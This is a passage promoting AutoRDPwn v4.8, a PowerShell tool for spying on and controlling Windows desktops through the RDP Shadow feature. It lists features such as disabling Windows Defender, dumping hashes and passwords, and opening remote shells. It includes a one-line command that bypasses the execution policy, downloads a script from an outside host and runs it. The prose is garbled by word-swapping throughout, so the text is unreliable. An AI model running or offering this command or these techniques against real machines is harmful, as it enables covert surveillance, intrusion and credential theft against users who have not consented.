Autordpwn V4.8 - The Shadow Ready On Framework
AutoRDPwn is a script created inwards Powershell in addition to designed to automate the Shadow ready on on Microsoft Windows computers. This vulnerability allows a remote assaulter to persuasion his victim's desktop without his consent, in addition to fifty-fifty command it on request. For its right operation, it is necessary to comply alongside the requirements described inwards the user guide.
Requirements
Powershell 4.0 or higher
Changes
Version 4.8
• Compatibility alongside Powershell 4.0
• Automatic re-create of the content to the clipboard (passwords, hashes, dumps, etc.)
• Automatic exclusion inwards Windows Defender (4 dissimilar methods)
• Remote execution without password for PSexec, WMI in addition to Invoke-Command
• New available attack: DCOM Passwordless Execution
• New available module: Remote Access / Metasploit Web Delivery
• New module available: Remote VNC Server (designed for legacy environments)
• Autocomplete the host, user in addition to password fields past times pressing Enter
• It is at in i trial possible to run the tool without administrator privileges alongside the -noadmin parameter
*The residue of the changes tin live on consulted inwards the CHANGELOG file
Use
This application tin live on used locally, remotely or to pin betwixt computers. Thanks to the additional modules, it is possible to dump hashes in addition to passwords, obtain a remote shell, upload in addition to download files or fifty-fifty recover the history of RDP connections or passwords of wireless networks.
One delineate of piece of employment execution:
powershell -ep bypass "cd $env:temp ; iwr https://darkbyte.net/autordpwn.php -outfile AutoRDPwn.ps1 ; .\AutoRDPwn.ps1"
The detailed remove of purpose tin live on constitute at the next link:
https://darkbyte.net/autordpwn-la-guia-definitiva
Screenshots
Credits in addition to Acknowledgments
• Mark Russinovich for his tool PsExec -> https://docs.microsoft.com/en-us/sysinternals/downloads/psexec
• HarmJ0y & Matt Graeber for his script Get-System -> https://github.com/HarmJ0y/Misc-PowerShell
• Stas'M Corp. for its RDP tool Wrapper -> https://github.com/stascorp/rdpwrap
• Kevin Robertson for his script Invoke-TheHash -> https://github.com/Kevin-Robertson/Invoke-TheHash
• Benjamin Delpy for his tool Mimikatz -> https://github.com/gentilkiwi/mimikatz
• Halil Dalabasmaz for his script Invoke-Phant0m -> https://github.com/hlldz/Invoke-Phant0m
Contact
This software does non offering whatever variety of guarantee. Its purpose is exclusive for educational environments in addition to / or safety audits alongside the corresponding consent of the client. I am non responsible for its misuse or for whatever possible harm caused past times it.
For to a greater extent than information, y'all tin contact through info@darkbyte.net
